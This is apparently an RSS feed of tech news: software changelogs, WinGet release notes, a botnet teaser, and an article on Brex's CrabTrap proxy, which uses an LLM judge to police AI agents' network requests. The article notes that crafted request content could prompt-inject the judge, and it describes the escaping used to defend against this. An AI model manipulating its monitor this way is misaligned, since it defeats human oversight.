<li>Fixed PowerShell tool commands hanging until timeout when a child process waited on standard input (Windows)</li>
<li>Fixed Python scripts under the PowerShell tool crashing with UnicodeDecodeError when reading non-UTF-8 data from standard input (Windows)</li>
<li>Fixed Python scripts run via the PowerShell tool crashing with UnicodeEncodeError on non-ASCII output, and PowerShell 7 error messages containing raw ANSI escape sequences (Windows)</li>
<li>Fixed the PowerShell tool reporting <code>where.exe</code>, <code>fc.exe</code>, and <code>diff.exe</code> as errors when they return a valid negative answer (Windows)</li>
<li>Fixed <code>&gt;</code> and <code>&gt;&gt;</code> under the PowerShell tool on Windows PowerShell 5.1 writing UTF-16LE files that other tools couldn't read as UTF-8</li>
<li>Fixed a displaced background daemon deleting its successor's control socket on shutdown, which made the next client kill the healthy replacement daemon</li>
<li>Fixed background sessions parked with <code>←</code> or <code>/background</code> and left idle keeping the background daemon and a worker process alive indefinitely</li>
<li>Fixed completed background sessions being impossible to remove via <code>claude rm</code> or the agent view once the background service had gone idle</li>
<li>Fixed background sessions dispatched from a non-git folder being impossible to delete from the agents view</li>
<li>Fixed reopening a stopped background session failing to restore its saved conversation when an unreadable folder exists in the session store</li>
<li>Fixed the Remote Control "session ready" push notification firing for sessions where Remote Control was not explicitly enabled</li>
<li>Fixed <code>/install-github-app</code> and the <code>/mcp</code> settings menu being blocked in agent-view sessions — they're now refused only in background sessions with no terminal attached</li>
<li>Fixed plugins enabled via the <code>--settings</code> CLI flag not loading (regression since v2.1.181)</li>
<li>Fixed feature flags going stale in long-running sessions after the OAuth token rotates</li>
<li>Fixed <code>/ultrareview</code> refusing to run in repos with no merge base — it now offers to review all tracked files</li>
<li>Fixed <code>claude update</code> and <code>claude doctor</code> hanging silently, and the <code>/status</code> System diagnostics section going blank, when a shell-config path is a directory</li>
<li>Fixed memory frontmatter values being silently truncated at an inline <code>#</code> when memory files are saved</li>
<li>Fixed session cost and token telemetry double-counting on streams that emit multiple cumulative <code>message_delta</code> frames</li>
<li>Fixed a spurious "check your network" warning that appeared while the advisor was thinking</li>
<li>Fixed hooks with exit code 2 not blocking as documented when the hook's stdout JSON fails schema validation</li>
<li>Fixed OTel log events emitted outside the turn's async context missing the interaction span's trace context</li>
<li>Fixed MCP transient errors during prompts/resources refresh clearing the server's slash commands and resources</li>
<li>Improved the <code>claude rc</code> workspace-trust error in the home directory to say trust there is never saved and to suggest running from a project directory</li>
<li>Changed single-segment <code>dir/**</code> hook <code>if:</code> conditions to match only <code>&lt;cwd&gt;/dir</code>; write <code>**/dir/**</code> for any-depth matching. <code>deny</code>/<code>ask</code> permission rules keep their any-depth match.</li>
<li>Changed <code>file</code> commands using <code>-m</code>/<code>--magic-file</code> or <code>-f</code>/<code>--files-from</code> to require permission instead of being auto-allowed as read-only</li>
<li>Changed keep-alive connection pooling to disable after a stale-connection error, so retries open a fresh socket</li>
<li>Changed SessionStart hooks to report source <code>"fork"</code> when a session begins as a fork instead of <code>"resume"</code></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows Package Manager 1.30.50-preview]]></title>
<description><![CDATA[This is a preview build of WinGet for those interested in trying out upcoming features and fixes. While it has had some use and should be free of major issues, it may have bugs or usability problems. If you find any, please help us out by filing an issue.
New in v1.30
Nothing yet.
Bug Fixes

Fixe...]]></description>
<link>https://tsecurity.de/de/3677248/downloads/windows-package-manager-13050-preview/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677248/downloads/windows-package-manager-13050-preview/</guid>
<pubDate>Sat, 18 Jul 2026 01:46:33 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This is a preview build of WinGet for those interested in trying out upcoming features and fixes. While it has had some use and should be free of major issues, it may have bugs or usability problems. If you find any, please help us out by <a href="https://github.com/microsoft/winget-cli/issues">filing an issue</a>.</p>
<h2>New in v1.30</h2>
<p>Nothing yet.</p>
<h2>Bug Fixes</h2>
<ul>
<li>Fixed a crash (<code>0x8000ffff</code>) when using <code>--disable-interactivity</code> with the Resume experimental feature enabled during install operations.</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>Apply latest loc patch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4565579611" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6262" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6262/hovercard" href="https://github.com/microsoft/winget-cli/pull/6262">#6262</a></li>
<li>Remove old Store certs, replace test use with generated ones by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4626150885" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6275" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6275/hovercard" href="https://github.com/microsoft/winget-cli/pull/6275">#6275</a></li>
<li>Add .gitattributes and normalize line endings across repo by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tianon-sso/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tianon-sso">@tianon-sso</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4600082935" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6267" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6267/hovercard" href="https://github.com/microsoft/winget-cli/pull/6267">#6267</a></li>
<li>Renormalize by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4633514887" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6276" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6276/hovercard" href="https://github.com/microsoft/winget-cli/pull/6276">#6276</a></li>
<li>Change event type by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4615424908" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6273" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6273/hovercard" href="https://github.com/microsoft/winget-cli/pull/6273">#6273</a></li>
<li>Update minor version, archive release notes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4642943454" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6279" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6279/hovercard" href="https://github.com/microsoft/winget-cli/pull/6279">#6279</a></li>
<li>Align .gitattributes and .editorconfig by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4668279620" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6285" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6285/hovercard" href="https://github.com/microsoft/winget-cli/pull/6285">#6285</a></li>
<li>Doc manifest schema process by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4643557474" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6280" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6280/hovercard" href="https://github.com/microsoft/winget-cli/pull/6280">#6280</a></li>
<li>Fix crash with --disable-interactivity and EFResume by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4703166998" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6302" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6302/hovercard" href="https://github.com/microsoft/winget-cli/pull/6302">#6302</a></li>
<li>Fix configuration elevation validation for standard flow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4708403993" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6307" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6307/hovercard" href="https://github.com/microsoft/winget-cli/pull/6307">#6307</a></li>
<li>Bump markdown-it from 14.1.1 to 14.2.0 in /tools/WinGetLogViewer by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4686342275" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6296" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6296/hovercard" href="https://github.com/microsoft/winget-cli/pull/6296">#6296</a></li>
<li>Bump undici from 7.25.0 to 7.28.0 in /tools/WinGetLogViewer by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4705714856" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6305" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6305/hovercard" href="https://github.com/microsoft/winget-cli/pull/6305">#6305</a></li>
<li>Bump form-data from 4.0.5 to 4.0.6 in /tools/WinGetLogViewer by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4710948701" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6311" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6311/hovercard" href="https://github.com/microsoft/winget-cli/pull/6311">#6311</a></li>
<li>Clean vcpkg artifacts on solution clean by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4754061053" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6339" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6339/hovercard" href="https://github.com/microsoft/winget-cli/pull/6339">#6339</a></li>
<li>Fix punctuation in error messages by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/idleberg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/idleberg">@idleberg</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4715127350" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6314" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6314/hovercard" href="https://github.com/microsoft/winget-cli/pull/6314">#6314</a></li>
<li>Fix cpprest checked iterator build error by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4703039819" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6301" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6301/hovercard" href="https://github.com/microsoft/winget-cli/pull/6301">#6301</a></li>
<li>Undo normalization of external files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4753826668" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6336" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6336/hovercard" href="https://github.com/microsoft/winget-cli/pull/6336">#6336</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tianon-sso/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tianon-sso">@tianon-sso</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4600082935" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6267" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6267/hovercard" href="https://github.com/microsoft/winget-cli/pull/6267">#6267</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/idleberg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/idleberg">@idleberg</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4715127350" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6314" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6314/hovercard" href="https://github.com/microsoft/winget-cli/pull/6314">#6314</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/microsoft/winget-cli/compare/v1.29.240...v1.30.50-preview"><tt>v1.29.240...v1.30.50-preview</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Brex built its AI agent policy by watching what agents actually do, not by writing rules first]]></title>
<description><![CDATA[OpenClaw has become one of the most widely adopted agentic frameworks, but it has yet to prove itself at enterprise scale. Agents need real credentials — API keys, OAuth tokens, service accounts — to work effectively, and Brex found that traditional guardrails couldn't contain what those agents w...]]></description>
<link>https://tsecurity.de/de/3676907/it-nachrichten/brex-built-its-ai-agent-policy-by-watching-what-agents-actually-do-not-by-writing-rules-first/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676907/it-nachrichten/brex-built-its-ai-agent-policy-by-watching-what-agents-actually-do-not-by-writing-rules-first/</guid>
<pubDate>Fri, 17 Jul 2026 21:32:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://venturebeat.com/security/openclaw-500000-instances-no-enterprise-kill-switch">OpenClaw</a> has become one of the most widely adopted agentic frameworks, but it has yet to prove itself at enterprise scale. Agents need real credentials — API keys, OAuth tokens, service accounts — to work effectively, and Brex found that traditional guardrails couldn't contain what those agents were doing with them.</p><p>Brex set out to overcome these limitations by building an internal platform it calls CrabTrap. The <a href="https://www.brex.com/journal/building-crabtrap-open-source">open-source HTTP/HTTPS proxy</a> intercepts all network traffic, examines policy rules, and uses a LLM-as-a-judge to decide whether agent requests should be approved or denied. </p><p>“What we noticed was that the network layer was an untapped enforcement point,” Brex co-founder and CEO Pedro Franceschi told VentureBeat. “Every request an agent makes is an opportunity to intercept, reason about, and make a policy decision.”</p><p>The takeaway Franceschi wants IT leaders to draw: agent governance should shift from SDK-level permissions and model guardrails toward a centralized network control plane that enforces and learns from real in-the-wild agent behavior.</p><h2>How Brex targeted the transport layer</h2><p>The “obvious fix” (at least initially) to the agent security gap was guardrails, and much of the early work has centered on scoped tools, per-action permissions, and human-in-the-loop approvals. But as agents evolve, each new capability means there’s another API to tune or surface to audit, Franceschi noted. </p><p>“Any <a href="https://venturebeat.com/orchestration/trunk-tools-stack-cut-document-review-from-60-days-to-10-by-ditching-general-purpose-models">agentic system</a> with multiple tools and access to the open internet creates an immediate tension for builders: The more capable you make an agent, the more dangerous it becomes, and the safer you make it, the less useful it is,” he said. </p><p>Existing solutions to this tradeoff were “weak”: Fine-grained API tokens help at the margins but can still be misused and constrain functionality. Semantic guardrails (such as context, skills, or prompt steering) are easily bypassed by prompt injection, especially for agents connected to the internet.</p><p>Agents can be “defanged” when given read-only access or limited toolsets, but then they can't do meaningful work, Franceschi said. On the other hand, granting broad write access and a large tool surface can result in hallucinations and real production consequences.</p><p>Model context protocol (MCP) gateways enforce policy at the protocol layer — but only for traffic using MCP. Meanwhile, guardrails from LLM providers are tied to a single model and can be “opaque” to customize with enterprise-specific policies. And powerful tools like Nvidia OpenShell offer more of a “per-sandbox egress control.”</p><p>“When we started, we hadn’t found a solution to deploying harnesses like OpenClaw safely,” Franceschi said. “Instead of waiting for the industry to catch up, we decided to own the problem and invent the necessary tools.”</p><p>Notably, they needed a platform that sat between every agent and every network request, and could make “nuanced decisions about what to allow,” he said. </p><p>This made the transport layer a core architectural component and natural starting point, he said. </p><p>By operating at this layer, CrabTrap is framework-agnostic, language-agnostic, and API-agnostic. It doesn't require SDK wrappers or per-tool integration. Users set <i>HTTP_PROXY</i> and <i>HTTPS_PROXY</i> in the agent's environment, and every outbound request routes through the proxy before it reaches a destination.</p><p>However, Franceschi emphasized, Brex didn't start at the transport layer because it thought it was the only answer; rather, they believe in “security by layers.”</p><p>“The transport layer was simply an underinvested one, and we saw an opportunity to add meaningful enforcement there alongside everything else,” he said. </p><h2>The LLM-as-a-judge training loop</h2><p>CrabTrap combines deterministic static rules with an <a href="https://venturebeat.com/infrastructure/monitoring-llm-behavior-drift-retries-and-refusal-patterns">LLM-as-a-judge</a> for requests that fall outside known patterns, Franceschi explained. The judge only “fires on the long tail of unfamiliar endpoints or unusual request shapes,” which for a mature agent is typically fewer than 3% of requests.</p><p>The more pressing problem was how to know that a policy is the right one? With static rules, it's “relatively straightforward” to reason about accuracy. But with an LLM judge, the system is nondeterministic, and users need confidence that the policy approves the right requests and blocks the rest.</p><p>“Our key insight was to bootstrap policy from observed behavior rather than write it from scratch,” Franceschi said. Beginning with real behavior and editing down based on real-world learnings turned out to be “dramatically more effective than starting from a blank page.”</p><p>Brex’s team built a policy builder (itself an agentic loop) that runs underlying agents in shadow mode, analyzes historic network traffic, samples representative calls, and drafts a natural-language policy that matches what the agent actually does. </p><p>From there, they built an eval system that tests policy changes before they go live. CrabTrap compares historical audit entries against a draft policy and reports the exact changes to be made. Users can slice results by method, URL, original decision, and agreement status. </p><p>All of this runs with concurrent judge calls, so replaying thousands of requests “takes minutes, not hours,” Franceschi said. Brex also developed a live feedback loop: Full audit trails are stored in PostgreSQL and queryable through the admin API and dashboard. In cases where a resource is continuously denied, the system can notify a human or an agent to propose a policy update for review. </p><p>“That closes the loop between observed denials and policy refinement,” Franceschi said. </p><h2>Core challenges and roadblocks </h2><p>Of course, the build wasn’t without its challenges. A big one was latency: “Putting an LLM between an agent and every outbound API request sounds like it would grind things to a halt,” he said. </p><p>However, it didn’t turn out to be as big a problem as expected. This was for two reasons: The LLM judge only activates on a small fraction of requests (the aforementioned 3%). Agents quickly settle into predictable traffic patterns; once observed, high-volume patterns become static rules. Second, by using small, fast models like Claude Haiku meant that, even when the judge did fire, added latency was “negligible.” This can be further reduced with local models and prompt caching, Franceschi said. </p><p>The harder and less obvious challenge was prompt injection, he said. The judge receives the full HTTP request and all content is user-controlled, so potentially, a crafted URL, header, or request body could manipulate the judge's decision. </p><p>Brex addressed this by structuring the request as a JSON object before sending it to the model, so all user-controlled content is “escaped rather than interpolated as raw text,” Franceschi said. </p><h2>Results, and where CrabTrap might evolve</h2><p>Brex tracks a few factors to measure CrabTrap’s internal impact: Engagement with agents, network traffic patterns, and net promoter scores (NPS). The most meaningful result of CrabTrap has been “organizational confidence,” Franceschi said. </p><p>Previously, the team had “real hesitation” when it came to deploying autonomous agents broadly across business operations, because the existing guardrail options didn't provide enough assurance. </p><p>“CrabTrap changed that calculus,” Franceschi said. They now have an enforcement layer they trust, increasing confidence around expanding agent deployment into more parts of the business and delegating more agent configuration and management to users. </p><p>Franceschi described the policies derived from traffic as “surprisingly strong.” The team expected the policy builder to produce a “rough starting point” requiring heavy manual editing. In practice, though, pointing the platform at a few days of real traffic produced policies that matched human judgment on the “vast majority of held-out requests.”</p><p>Additionally, CrabTrap revealed how much noise agents generate. “The audit trail made this visible for the first time,” Franceschi said. They used denial logs and traffic analysis not only to tune policies, but to tighten agents themselves, remove tools, and cut out entire categories of requests that were wasting both time and tokens.</p><p>“The proxy became a discovery tool, not just an enforcement one,” he said. </p><h2>Areas for growth (and input from the open-source community)</h2><p>Brex anticipates CrabTrap to continue to evolve, particularly as they have released it as open-source. “We hope the community helps shape it,” Franceschi said. </p><p>Areas of improvement include deeper authentication functionality such as single-sign on (SSO), fine-grained role-based access control (RBAC); escalation workflows that allow agents to request additional permissions; and policy recommendations based on denial patterns.</p><p>Programmatic configuration, or developing API endpoints for “creating, forking, and applying” policies to agents, could allow the whole policy lifecycle to be automated rather than managed manually, Franceschi said. </p><p>As for escalation, if an agent is continuously denied a given resource or endpoint, it should be able to route requests to humans or other AI agents for review and back that up with a rationale for why it needs access. </p><p>“That turns CrabTrap from a hard enforcement boundary into something more like a managed permission system,” Franceschi said. </p><p>Additionally, the policy was built to bootstrap from network traffic, but there is opportunity to incorporate additional signals around agent traces and resource-calling, as well as broader context on what agents are ultimately trying to accomplish. This can help produce more accurate and nuanced policies. </p><p>Finally, there's an “open philosophical question” about the right posture for CrabTrap: Should it be a fully transparent layer that the agent itself is unaware of, or should it operate more like a “well-intentioned manager”? (that is, the agent knows about the layer and can interact with it). </p><p>The open-source community can help shape these developments, and CrabTrap will only get better with more users, Franceschi said. Brex’s agents speak to a specific set of APIs; teams using CrabTrap with different agents, services, and policy requirements will surface “edge cases and patterns we can't hit alone.”</p><p>“We have ambitious plans for where it could go, and we’d rather build in the open,” Franceschi said. </p><h2>What other builders can learn from CrabTrap</h2><p>The response has been stronger than expected. <a href="https://github.com/brexhq/CrabTrap">CrabTrap has more than 700 stars on GitHub</a>. Franceschi said Brex has also heard from OpenAI, Y Combinator CEO Garry Tan, and programmer Pete Steinberger, all expressing interest in deploying similar internal infrastructure.</p><p>The broader lesson: “Don't let infrastructure gaps become excuses to wait," Franceschi advised. There are “real blockers” for every enterprise looking to seriously deploy AI agents, including security concerns, lack of tooling, or unclear guardrails. </p><p>“It's tempting to sit on your hands until the industry catches up,” he said. “The lesson from CrabTrap is that you can own those problems directly.”</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New NadMesh Botnet Hunts Exposed AI Services for Cloud Keys and Kubernetes Tokens]]></title>
<description><![CDATA[A Go botnet called NadMesh turned up in early July hunting exposed AI services, and the operator's own dashboard claims 3,811 unique AWS keys.

A Shodan harvester keeps the scan queue stocked with ComfyUI, Ollama, n8n, Open WebUI, Langflow, and Gradio: the image generators, local model runners, a...]]></description>
<link>https://tsecurity.de/de/3676657/it-security-nachrichten/new-nadmesh-botnet-hunts-exposed-ai-services-for-cloud-keys-and-kubernetes-tokens/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676657/it-security-nachrichten/new-nadmesh-botnet-hunts-exposed-ai-services-for-cloud-keys-and-kubernetes-tokens/</guid>
<pubDate>Fri, 17 Jul 2026 19:24:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A Go botnet called NadMesh turned up in early July hunting exposed AI services, and the operator's own dashboard claims 3,811 unique AWS keys.

A Shodan harvester keeps the scan queue stocked with ComfyUI, Ollama, n8n, Open WebUI, Langflow, and Gradio: the image generators, local model runners, and workflow builders that teams stand up fast and firewall late.

The intel feed behind that counter]]></content:encoded>
</item>
<item>
<title><![CDATA[Comic Chat ist Open Source: Microsoft gibt Ursprung von Comic Sans frei]]></title>
<description><![CDATA[Microsoft hat den Quellcode seines fast vergessenen Chatprogramms Comic Chat als Open Source veröffentlicht und damit ein Stück Computergeschichte wieder zugänglich gemacht. Der berühmte Font Comic Sans hat hier seinen Ursprung.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3675512/it-security-nachrichten/comic-chat-ist-open-source-microsoft-gibt-ursprung-von-comic-sans-frei/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675512/it-security-nachrichten/comic-chat-ist-open-source-microsoft-gibt-ursprung-von-comic-sans-frei/</guid>
<pubDate>Fri, 17 Jul 2026 10:54:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,160047.html"><img hspace="5" border="0" align="left" alt="Sicherheit, Sicherheitslücke, Security, Schadsoftware, Cybersecurity, Exploit, Cybercrime, Open Source, Code, Programmierung, Quellcode, Developer, Programmieren, schloss, Sourcecode, Coding, Coder, Development, Opensource, Source Code, Open Source Software, Quelloffen, Lock, Quelltext" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/56871.jpg"></a>
			Microsoft hat den Quellcode seines fast vergessenen Chatprogramms Comic Chat als <a href="https://winfuture.de/special/open-source/" title="Open Source Special">Open Source</a> veröffentlicht und damit ein Stück Computergeschichte wieder zugänglich gemacht. Der berühmte Font Comic Sans hat hier seinen Ursprung.			(<a href="https://winfuture.de/news,160047.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[LaKanDoR - Systemaktualisierung (Solidarität als Standardeinstellung) 🎵]]></title>
<description><![CDATA[#OpenSource #Technologie #PolitischeMusik     submitted by    /u/Horus_Sirius   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3674910/it-security-nachrichten/lakandor-systemaktualisierung-solidaritaet-als-standardeinstellung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674910/it-security-nachrichten/lakandor-systemaktualisierung-solidaritaet-als-standardeinstellung/</guid>
<pubDate>Fri, 17 Jul 2026 04:09:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<table> <tr><td> <a href="https://www.reddit.com/r/Computersicherheit/comments/1uy6n0c/lakandor_systemaktualisierung_solidarit%C3%A4t_als/"> <img src="https://external-preview.redd.it/aThwdWVkdWpzbGRoMe0PXkgdUfecaNq-QqtzWstuZw-6b3__Ki6AL1kwgkUy.png?width=640&amp;crop=smart&amp;auto=webp&amp;s=7c4161b1834e21627e9ff6d7ed8a6a1b886016c7" alt="LaKanDoR - Systemaktualisierung (Solidarität als Standardeinstellung) 🎵" title="LaKanDoR - Systemaktualisierung (Solidarität als Standardeinstellung) 🎵"> </a> </td><td> <!-- SC_OFF --><div class="md"><p>#OpenSource #Technologie #PolitischeMusik </p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Horus_Sirius"> /u/Horus_Sirius </a> <br> <span><a href="https://v.redd.it/gkzt6bujsldh1">[link]</a></span>   <span><a href="https://www.reddit.com/r/Computersicherheit/comments/1uy6n0c/lakandor_systemaktualisierung_solidarit%C3%A4t_als/">[comments]</a></span> </td></tr></table>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.212]]></title>
<description><![CDATA[What's changed

/fork now copies your conversation into a new background session (its own row in claude agents) while you keep working; the in-session subagent it used to launch is now /subtask
Added claude auto-mode reset to restore the default auto-mode configuration, with a confirmation prompt...]]></description>
<link>https://tsecurity.de/de/3674861/downloads/v21212/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674861/downloads/v21212/</guid>
<pubDate>Fri, 17 Jul 2026 02:31:39 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li><code>/fork</code> now copies your conversation into a new background session (its own row in <code>claude agents</code>) while you keep working; the in-session subagent it used to launch is now <code>/subtask</code></li>
<li>Added <code>claude auto-mode reset</code> to restore the default auto-mode configuration, with a confirmation prompt (pass <code>--yes</code> to skip)</li>
<li>Added a session-wide limit on WebSearch tool calls (default 200, tunable via <code>CLAUDE_CODE_MAX_WEB_SEARCHES_PER_SESSION</code>) to stop runaway search loops</li>
<li>Added a per-session cap on subagent spawns (default 200, override with <code>CLAUDE_CODE_MAX_SUBAGENTS_PER_SESSION</code>) to stop runaway delegation loops; <code>/clear</code> resets the budget</li>
<li>MCP tool calls running longer than 2 minutes now move to the background automatically so the session stays usable; configure the threshold or disable with <code>CLAUDE_CODE_MCP_AUTO_BACKGROUND_MS</code></li>
